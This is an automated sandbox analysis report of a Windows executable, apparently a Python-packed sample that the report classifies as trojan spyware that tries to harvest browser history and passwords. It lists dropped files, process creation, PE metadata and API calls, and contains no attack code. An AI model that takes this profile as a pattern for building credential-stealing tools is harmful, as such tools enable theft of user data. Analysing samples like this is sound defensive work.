Windows Analysis Report
KzqQe0QtRd.exe

Source: KzqQe0QtRd.exe	ReversingLabs: Detection: 41%
Source: KzqQe0QtRd.exe	Virustotal: Detection: 21%

Source: C:\Users\user\Desktop\KzqQe0QtRd.exe

File read: C:\Users\user\Desktop\KzqQe0QtRd.exe

Source: KzqQe0QtRd.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\KzqQe0QtRd.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\KzqQe0QtRd.exe C:\Users\user\Desktop\KzqQe0QtRd.exe
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Process created: C:\Users\user\Desktop\KzqQe0QtRd.exe C:\Users\user\Desktop\KzqQe0QtRd.exe
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Process created: C:\Users\user\Desktop\KzqQe0QtRd.exe C:\Users\user\Desktop\KzqQe0QtRd.exe	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"	Jump to behavior

Source: C:\Users\user\Desktop\KzqQe0QtRd.exe

File created: C:\Users\user~1\AppData\Local\Temp\_MEI67202

Tries to harvest and steal browser information (history, passwords, etc)

Source: classification engine

Classification label: mal72.troj.spyw.winEXE@6/80@14/8

Source: C:\Users\user\Desktop\KzqQe0QtRd.exe

Code function: 0_2_00007FF7012674E0 GetLastError,FormatMessageW,WideCharToMultiByte,

0_2_00007FF7012674E0

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6876:120:WilError_01

Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: KzqQe0QtRd.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: KzqQe0QtRd.exe

Static file information: File size 14042365 > 1048576

Source: KzqQe0QtRd.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: KzqQe0QtRd.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: KzqQe0QtRd.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: KzqQe0QtRd.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: KzqQe0QtRd.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: KzqQe0QtRd.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: KzqQe0QtRd.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: KzqQe0QtRd.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: KzqQe0QtRd.exe, 00000000.00000003.212170582.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: KzqQe0QtRd.exe, 00000000.00000003.212514021.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: KzqQe0QtRd.exe, 00000000.00000003.209566729.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: KzqQe0QtRd.exe, 00000000.00000003.209613878.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: KzqQe0QtRd.exe, 00000000.00000003.209248171.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: KzqQe0QtRd.exe, 00000000.00000003.209811582.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: KzqQe0QtRd.exe, 00000000.00000003.209613878.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: KzqQe0QtRd.exe, 00000000.00000003.209763072.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: KzqQe0QtRd.exe, 00000000.00000003.209296479.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: KzqQe0QtRd.exe, 00000000.00000003.209196811.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: KzqQe0QtRd.exe, 00000000.00000003.209196811.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: KzqQe0QtRd.exe, 00000000.00000003.209846231.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: KzqQe0QtRd.exe, 00000000.00000003.209677396.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp

Source: KzqQe0QtRd.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: KzqQe0QtRd.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: KzqQe0QtRd.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: KzqQe0QtRd.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: KzqQe0QtRd.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: KzqQe0QtRd.exe	Static PE information: section name: _RDATA
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA
Source: libcrypto-3.dll.0.dr	Static PE information: section name: .00cfg
Source: libssl-3.dll.0.dr	Static PE information: section name: .00cfg
Source: python311.dll.0.dr	Static PE information: section name: PyRuntim

Source: VCRUNTIME140.dll.0.dr

Static PE information: 0xC94BF788 [Wed Jan 6 22:49:44 2077 UTC]

Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\charset_normalizer\md.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_cffi_backend.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\charset_normalizer\md__mypyc.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_x25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\python311.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\VCRUNTIME140.dll	Jump to dropped file

Source: C:\Users\user\Desktop\KzqQe0QtRd.exe

Code function: 0_2_00007FF701263E10 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00007FF701263E10

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_x25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file

Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Code function: 0_2_00007FF701267850 FindFirstFileExW,FindClose,	0_2_00007FF701267850
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Code function: 0_2_00007FF701276744 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF701276744
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Code function: 0_2_00007FF7012809E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF7012809E4
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Code function: 0_2_00007FF701276744 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF701276744

Source: KzqQe0QtRd.exe, 00000001.00000003.219427429.0000022126EA1000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287906992.0000022126E9C000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220570230.0000022126E65000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275709684.0000022126E65000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276603902.0000022126E8B000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.218845967.0000022126EA1000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.221301062.0000022126E65000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.222529571.0000022126E65000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.219985364.0000022126E65000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280336661.0000022126E93000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\KzqQe0QtRd.exe

Code function: 0_2_00007FF701279B14 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF701279B14

Source: C:\Users\user\Desktop\KzqQe0QtRd.exe

Code function: 0_2_00007FF7012825D0 GetProcessHeap,

0_2_00007FF7012825D0

Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Code function: 0_2_00007FF70126B1B0 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,	0_2_00007FF70126B1B0
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Code function: 0_2_00007FF701279B14 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF701279B14
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Code function: 0_2_00007FF70126AE30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF70126AE30
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Code function: 0_2_00007FF70126B6CC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF70126B6CC
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Code function: 0_2_00007FF70126B8B0 SetUnhandledExceptionFilter,	0_2_00007FF70126B8B0

Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Process created: C:\Users\user\Desktop\KzqQe0QtRd.exe C:\Users\user\Desktop\KzqQe0QtRd.exe			Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"			Jump to behavior

Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Util VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\charset_normalizer VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\certifi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
